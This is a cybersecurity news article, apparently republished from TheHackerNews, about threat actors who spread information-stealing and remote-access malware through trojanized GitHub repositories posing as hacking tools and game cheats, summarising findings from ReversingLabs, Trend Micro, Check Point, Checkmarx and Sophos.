The Malware
Cybersecurity researchers recently uncovered a new campaign, revealing that threat actors published more than 67 GitHub repositories. These repositories claim to offer Python-based hacking tools; however, they deliver trojanized payloads instead.
This activity, which ReversingLabs codenamed Banana Squad, appears to continue a rogue Python campaign originally identified in 2023. At that time, attackers targeted the Python Package Index (PyPI) repository with bogus packages that attracted over 75,000 downloads and enabled information-stealing on Windows systems.
Moreover, the new findings expand on a previous report from SANS’s Internet Storm Center in November 2024. That report described a supposed “steam-account-checker” tool hosted on GitHub, which included stealthy features to download additional Python payloads. These payloads injected malicious code into the Exodus cryptocurrency wallet app and exfiltrated sensitive data to an external server (“dieserbenni[.]ru”).
Additionally, a deeper analysis of both the repository and the attacker-controlled infrastructure revealed 67 trojanized GitHub repositories. These repositories impersonate legitimate ones by using the same names, thereby deceiving unsuspecting users.
Evidence further indicates that this campaign targets users who search for tools like account cleaners and game cheats—including Discord account cleaner, Fortnite External Cheat, TikTok username checker, and PayPal bulk account checker. GitHub has since taken down all the identified repositories.
According to ReversingLabs researcher Robert Simmons, “Backdoors and trojanized code in publicly available source code repositories like GitHub are becoming more prevalent and represent a growing software supply chain attack vector.”
He also warned, “For developers relying on these open-source platforms, it’s essential to always double check that the repository you’re using actually contains what you expect.”
GitHub as a Malware Distribution Service
The development highlights how GitHub continues to attract attention as a malware distribution vector across several campaigns. Earlier this week, Trend Micro uncovered 76 malicious GitHub repositories that a threat actor, dubbed Water Curse, used to deliver multi-stage malware.
These payloads aim to siphon credentials, browser data, and session tokens. Additionally, they enable the threat actors to maintain persistent remote access to the compromised systems.
Shortly after, Check Point exposed another campaign that leverages a criminal service known as the Stargazers Ghost Network to infect Minecraft users with Java-based malware. This network comprises several GitHub accounts that spread malware or malicious links through phishing repositories.
According to Check Point, “The network consists of multiple accounts that distribute malicious links and malware and perform other actions such as starring, forking, and subscribing to malicious repositories to make them appear legitimate.”
Moreover, Check Point assessed that these GitHub “Ghost” accounts represent only a portion of a much larger system. Other Ghost accounts operate on different platforms, contributing to an expansive Distribution-as-a-Service (DaaS) infrastructure.
Earlier, in April 2024, Checkmarx revealed more details about the Stargazers Ghost Network. The group demonstrated a clear pattern of using fake stars and frequent updates to artificially boost repository visibility and push them to the top of GitHub search results.
These malicious repositories masquerade as legitimate projects, typically featuring popular games, game cheats, or tools like Cryptocurrency price Trackers and Multiplier Predictors for Crash-betting games.
In parallel, these campaigns overlap with another wave of attacks that target Inexperienced Cybercriminals who seek Easy-to-use malware or attack tools. These attackers trick them into Downloading Backdoored Repositories, which compromise their own systems with information Stealers.
Sophos find more
For instance, Sophos this month highlighted the Trojanized Sakura-RAT Repository. This repository contains hidden Malicious code that infects anyone who Compiles the project with information Stealers and remote access trojans (RATs).
Sophos researchers also identified four types of Backdoors across these Repositories: those Embedded in Visual Studio PreBuild events, Python scripts, Screensaver files, and JavaScript. These components steal data, capture Screenshots, communicate via Telegram, and download additional Payloads such as AsyncRAT, Remcos RAT, and Lumma Stealer.
Altogether, the company detected at least 133 Backdoored Repositories. Among them, 111 carried the PreBuild Backdoor, while the remaining ones hosted Python, Screensaver, or JavaScript-based Backdoors.
Furthermore, Sophos concluded that these campaigns are probably connected to a DaaS operation active since August 2022. This operation utilizes thousands of GitHub accounts to distribute malware through Trojanized Repositories focused on gaming cheats, exploits, and attack tools.
Although the precise distribution methods remain unclear, researchers believe the threat actors also use Discord servers and YouTube channels to promote links to the Compromised Repositories.
Sophos added, “It remains unclear if this campaign is directly linked to some or all of the previous campaigns reported on, but the approach does seem to be popular and effective, and is likely to continue in one form or another.”
The company further warned that future campaigns may shift focus to other user groups beyond Inexperienced Cybercriminals and gamers.
Source: TheHackerNews
Read more at Impreza News
